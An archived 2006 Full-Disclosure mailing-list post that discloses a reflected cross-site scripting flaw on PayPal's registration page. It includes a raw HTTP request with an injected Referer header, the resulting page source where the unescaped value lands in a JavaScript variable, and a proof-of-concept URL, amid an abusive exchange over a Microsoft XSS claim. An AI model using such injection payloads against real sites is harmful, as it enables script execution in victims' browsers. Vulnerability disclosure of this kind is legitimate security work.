[Full-disclosure] paypal.com xss (was Re: micosoft.com xss)

["Thomas Pollet" <thomas.pollet@xxxxxxxxx>]

Man you suck, codes or stfu.

I know the code is broken in more than 1 place, i tried registering event
handlers, exiting jscript etc. etc. time to move on....

point is xss is everywhere, trust noone etc. etc.

To make my point clear... last of the xss@xxxxxxxxx

GET https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/msword, application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, */*
Referer:
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison
";alert("xss");var%20f="


results in

....
<script type="text/javascript">
<!--
/* SiteCatalyst Variables */
s.pageName="SignUp:Landing Page";
s.prop11="general/SignupInitial.xsl::_registration-run::0";
s.channel="Sign Up:Landing Page";
s.r="
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&amp;source_page=_profile-comparison
";alert("xss");var%20f="";
s.prop7="Unknown";
s.prop8="Unknown";
s.prop9="Unknown";
s.prop10="US";
s.prop12="Unknown";
s.visitorSampling="20";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code) // -->
</script>

in other words.... referer url isn't correctly cleaned for paypal
registration page and used for js var.
poc: go to
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison
";alert("xss");s.r="

and click on the sign up link

Have a nice life, die soon,
Thomas


On 08/08/06, Mad World <penetrator@xxxxxxxxxx> wrote:
> Good morning !
>
> You can doubt, it's your right to do so.
> Wanna bet ?
> Just open your eyes and your nose will show you that you are actually
> braking silly structure of page in more than one place ..
> I's relatively easy using the same exact place of code you tried to make
> it.
> I have working example, it is based on other microsoft "features" as well.
>
> Greets,
> - Mad World
>
> --- thomas.pollet@xxxxxxxxx wrote:
>
> From: "Thomas Pollet" <thomas.pollet@xxxxxxxxx>
> To: penetrator@xxxxxxxxxx
> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: Re: [Full-disclosure] Re: micosoft.com xss
> Date: Tue, 8 Aug 2006 10:18:56 +0200
>
> On 08/08/06, Mad World <penetrator@xxxxxxxxxx> wrote:
>
>   Why do you need it ?
>   You already discovered xss, the rest of "job" is just matter
>   of technique.
>   I  think  majority  of  xss  submitters  here could do it by
>   various means.
>   M$ is lost in its own complexity of how to do simple things.
>   If  you  could ever give me reasonable answer for why do you
>   need  this  $hit  - I could give you the "rest", like others
>   could.
>
> I  doubt  you  actually  tried getting js executed on page load
> (for some reason they try to prevent xss in a number of ways).
> I did try and didn't succeed, that's why I ask.
> Greets,
> Thomas
>
>
>
> _____________________________________________________________
> Visit Thailand @ http://www.sawadee.com
> Websearch and email: DNSASIA.com ....  FAST!
> 128k dialup: login.samuinet.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/